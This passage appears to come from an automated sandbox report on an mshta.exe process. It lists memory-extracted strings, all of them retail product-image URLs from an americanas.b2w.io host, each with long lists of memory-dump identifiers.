Source: mshta.exe, 00000000.00000003.2677244929.00000000092EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2771183068.00000000092F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743843394.00000000092F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_TELEFONIA-53dfc973fda4.pngE
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2750136023.00000000092C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2771021484.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2764615643.00000000092CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751843809.00000000092CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744500179.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751601665.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_TV-dc4baf9a9983.png
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2750136023.00000000092C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656547873.0000000003426000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2771021484.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2764615643.00000000092CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751843809.00000000092CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744500179.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2766365966.0000000003426000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751601665.00000000092E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_UD-fe20595d366f.png
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664757219.0000000006E9C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2750136023.00000000092C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751960623.0000000006EA8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2542653121.000000000659B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2543257881.000000000659C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2764615643.00000000092CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2534072196.0000000006591000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751843809.00000000092CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744500179.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2542992354.000000000659C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006E7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/27/432x540-416b11512524.png
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670350202.000000000A87C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664940461.00000000093B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2772100906.00000000093BF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676815165.000000000AA24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744826440.000000000AA29000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669695737.00000000093B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652668755.000000000AA1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2750307387.000000000AA36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668949528.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650675847.000000000A9FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748068401.000000000A87C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774035249.000000000A87C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2534072196.0000000006591000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676562635.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2775048754.000000000AA39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/11/09/lojas_oficiais-432x540px-13e329cb6b3b.png
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2772182378.0000000009401000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726812852.0000000009360000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769831858.0000000006F1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748531062.0000000006F1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656004921.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654777564.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670320438.000000000935A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2677175292.000000000935B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665118307.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726694217.0000000009401000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/250x260-atalho-desk-app-baixe-o-app1-fb5282b
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664757219.0000000006E9C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664940461.00000000093B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727062236.000000000A851000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2771183068.00000000092F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669695737.00000000093B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2773869837.000000000A850000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769263479.0000000006ECD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743843394.00000000092F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-automotivo-9682e64705e8.png
Source: mshta.exe, 00000000.00000003.2677244929.00000000092EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2771183068.00000000092F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743843394.00000000092F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-automotivo-9682e64705e8.png%
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664757219.0000000006E9C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664940461.00000000093B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727062236.000000000A851000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669695737.00000000093B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769263479.0000000006ECD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006E7D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656004921.00000000093B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-bebidas-638b2185dbc9.png
Source: mshta.exe, 00000000.00000003.2651095257.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2772182378.0000000009401000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656004921.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665118307.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726694217.0000000009401000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669377685.0000000009401000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-bebidas-638b2185dbc9.png96648a2579.p
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664757219.0000000006E9C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2771183068.00000000092F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769263479.0000000006ECD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743843394.00000000092F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2716901409.0000000009A5C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2700261943.0000000009A5A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006E7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-cabelos-958c5b847ba9.png
Source: mshta.exe, 00000000.00000003.2677244929.00000000092EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2771183068.00000000092F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743843394.00000000092F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-cabelos-958c5b847ba9.pngM
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664940461.00000000093B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2772100906.00000000093BF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676815165.000000000AA24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744826440.000000000AA29000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669695737.00000000093B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652668755.000000000AA1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2750307387.000000000AA36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668949528.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650675847.000000000A9FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676562635.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2775048754.000000000AA39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-cama-mesa-banho-b9a0799a7519.png
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664940461.00000000093B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2772100906.00000000093BF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676815165.000000000AA24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744826440.000000000AA29000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669695737.00000000093B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652668755.000000000AA1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2750307387.000000000AA36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668949528.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650675847.000000000A9FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770103069.000000000927E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728542015.000000000921B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676562635.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2775048754.000000000AA39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-eletrodomesticos-9f15f33cde2a.png
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2772182378.0000000009401000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670350202.000000000A856000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664940461.00000000093B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2772100906.00000000093BF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669695737.00000000093B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2717099166.0000000009A8C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656004921.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A9AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774359125.000000000A8FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2714211819.0000000009A89000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665118307.00000000093F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-informatica-acessorios-8f96648a2579.
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664757219.0000000006E9C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664940461.00000000093B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727062236.000000000A851000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669695737.00000000093B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2773869837.000000000A850000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769263479.0000000006ECD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 